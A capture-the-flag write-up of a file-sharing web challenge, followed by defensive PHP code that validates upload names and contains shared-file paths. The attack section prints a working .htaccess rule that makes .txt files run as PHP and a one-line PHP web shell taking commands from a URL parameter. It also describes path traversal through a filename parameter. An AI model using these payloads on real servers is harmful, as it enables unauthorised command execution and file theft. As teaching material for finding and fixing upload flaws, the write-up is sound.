The only accessible page for Share Point was a login form. After fiddling with the login, I noticed that you were able to log in with some basic credentials like admin1111:password or admin11111:password. In the member area we had three possibilities:
First I tried to upload some .php files, which did not work (only some extensions like .jpg or .txt were allowed). After you had uploaded a file, you were able to share this file with a second user. This user could “accept” this file, which was then moved to the second user’s folder. This is also where I found the first vulnerability. When accepting a shared file, it was possible to modify the filename parameter and upload any file you want from the underlying system. I tried to find the flag with this, but my guesswork was not successful.
Next I moved PHP files from the application itself into my folder (/files/<username>/<filename>), but they resulted in 500 Internal Server Errors. I then had the idea to upload a .htaccess file and enable the PHP interpreter for a file extension I was allowed to upload (for example a .txt file). This surprisingly worked! I created the following .htaccess file:
AddType application/x-httpd-php .txt
After uploading this, I also submitted a foo.txt file with the following content:
<?php system($_GET['c']); ?>
Voilà, we got remote command execution:
The flag was found under /opt/flag.txt:
VolgaCTF{AnoTHer_apPro0ch_to_file_Upl0Ad_with_PhP}
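
Both weaknesses used above (the unchecked filename parameter when accepting a share, and the accepted .htaccess upload) can be closed in the application. The following PHP 8 code is an added example, not the challenge's code; the function names, ALLOWED_EXT and the demo directory are assumptions:

```php
<?php
// Added example, not the challenge's code. Names and ALLOWED_EXT are hypothetical.
const ALLOWED_EXT = ['jpg', 'txt'];

// Returns the name to store, or null when the client-supplied name is rejected.
function safe_upload_name(string $clientName): ?string
{
    // Keep only the last path component, whatever separator the client used.
    $name = basename(str_replace('\\', '/', $clientName));
    // One base name, one dot, one extension: this excludes dotfiles such as
    // .htaccess and double extensions such as x.php.txt.
    if (!preg_match('/^[A-Za-z0-9_-]+\.([A-Za-z0-9]+)\z/', $name, $m)) {
        return null;
    }
    return in_array(strtolower($m[1]), ALLOWED_EXT, true) ? $name : null;
}

// Resolves $fileName inside $baseDir/$owner. Returns the canonical path only
// when it is a regular file located inside that folder, otherwise null.
function resolve_shared_file(string $baseDir, string $owner, string $fileName): ?string
{
    // The owner must be a plain user name, never "..", "" or a path.
    if (!preg_match('/^[A-Za-z0-9_-]+\z/', $owner)) {
        return null;
    }
    $root = realpath($baseDir . '/' . $owner);
    if ($root === false) {
        return null;
    }
    // realpath() collapses ../ and follows symlinks before the prefix check.
    $path = realpath($root . '/' . $fileName);
    if ($path === false || !is_file($path)) {
        return null;
    }
    return str_starts_with($path, $root . DIRECTORY_SEPARATOR) ? $path : null;
}

// Constructed demo data in a throwaway directory.
$base = sys_get_temp_dir() . '/files_demo_' . bin2hex(random_bytes(4));
mkdir($base . '/alice', 0700, true);
file_put_contents($base . '/alice/notes.txt', 'hello');

foreach (['notes.txt', '.htaccess', 'foo.php', 'x.php.txt'] as $n) {
    printf("upload %-10s => %s\n", $n, var_export(safe_upload_name($n), true));
}
foreach (['notes.txt', '../../../etc/passwd', '/etc/passwd'] as $n) {
    printf("accept %-20s => %s\n", $n, var_export(resolve_shared_file($base, 'alice', $n), true));
}
```

Serving the upload folder with `AllowOverride None` additionally keeps Apache from reading an uploaded .htaccess even if one slips past validation.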